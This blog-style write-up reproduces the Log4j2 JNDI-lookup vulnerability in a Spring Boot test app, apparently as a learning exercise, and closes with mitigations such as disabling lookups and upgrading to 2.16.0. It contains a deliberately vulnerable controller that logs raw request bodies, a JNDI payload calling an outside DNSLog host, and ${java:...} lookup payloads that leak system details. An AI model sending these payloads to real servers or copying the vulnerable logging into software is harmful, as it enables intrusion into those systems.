SpringBoot复现log4j2漏洞

编程语言 2021-12-15 19:27:17 阅读次数: 0

工程搭建及环境

pom.xml


<parent>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-parent</artifactId>
   <version>2.6.1</version>
</parent>


<dependencies>
   <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <exclusions>
         <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
         </exclusion>
      </exclusions>

   </dependency>

   <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-log4j2</artifactId>
      <version>2.1.1.RELEASE</version>
   </dependency>
</dependencies>

复制代码

java环境 jdk1.8

java version "11.0.13" 2021-10-19 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.13+10-LTS-370)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.13+10-LTS-370, mixed mode)
复制代码

web接口编写

@RestController
public class TestController {


    private static final Logger logger = LogManager.getLogger(TestController.class);


    /**
     * ${java:vm}   打印 :Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)
     * <p>
     * <p>
     * http://www.dnslog.cn/
     * ${jndi:ldap://7yqrz4.dnslog.cn}
     *
     * @param str
     * @return
     */
    @PostMapping("/test")
    public String test(@RequestBody String str) {
        logger.info("str={}", str);
        return "return=" + str;
    }
}
复制代码

测试漏洞

image.png

image.png

java:vm为什么会打印?debug进去看看,路径:org.apache.logging.log4j.core.lookup.JavaLookup#lookup

image.png

image.png

发现key有不少,挨个试下:

${java:vm}
Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)


${java:locale}
default locale: zh_CN, platform encoding: UTF-8

${java:hw}
processors: 4, architecture: x86_64-64


${java:os}
Mac OS X 10.14.6 unknown, architecture: x86_64-64

${java:version}
Java version 1.8.0_162

${java:runtime}
Java(TM) SE Runtime Environment (build 1.8.0_162-b12) from Oracle Corporation
复制代码

image.png

DNSLog www.dnslog.cn/

image.png

image.png

image.png

image.png

应对方案 ,受影响版本:Apache Log4j 2.x <= 2.14.1

  1. jvm参数 -Dlog4j2.formatMsgNoLookups=true
  2. 修改配置 log4j2.formatMsgNoLookups=True
  3. 系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true
  4. 升级>=2.16.0 mvnrepository.com/artifact/or…
  5. 如果是依赖spring-boot-starter-log4j2
pom.xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <version>2.1.1.RELEASE</version>

    <!--先排除-->
    <exclusions>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
        </exclusion>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
        </exclusion>
    </exclusions>
</dependency>

<!--再手动添加-->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.16.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.16.0</version>
</dependency>
复制代码

参考

apache log4j lookups

Apache Log4j CVE

猜你喜欢

转载自juejin.im/post/7041843601118068773
今日推荐
周排行
Android图片与下拉框
java常用的设计模式之单例模式
zabbix自动化监控之自动注册
杨老师课堂之Excel VBA 程序开发第八讲使用工作表函数
Android 去掉底部虚拟导航栏
Android Studio 3.2 Beta 4 发布,功能改进和修复
Linux-3.5_总线驱动设备
Qt QTableView QStandardItemModel用法
session处理
分享几个实用的方法
每日归档
更多
2025-02-06(0)
2025-02-05(0)
2025-02-04(0)
2025-02-03(0)
2025-02-02(0)
2025-02-01(0)
2025-01-31(0)
2025-01-30(0)
2025-01-29(0)
2025-01-28(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022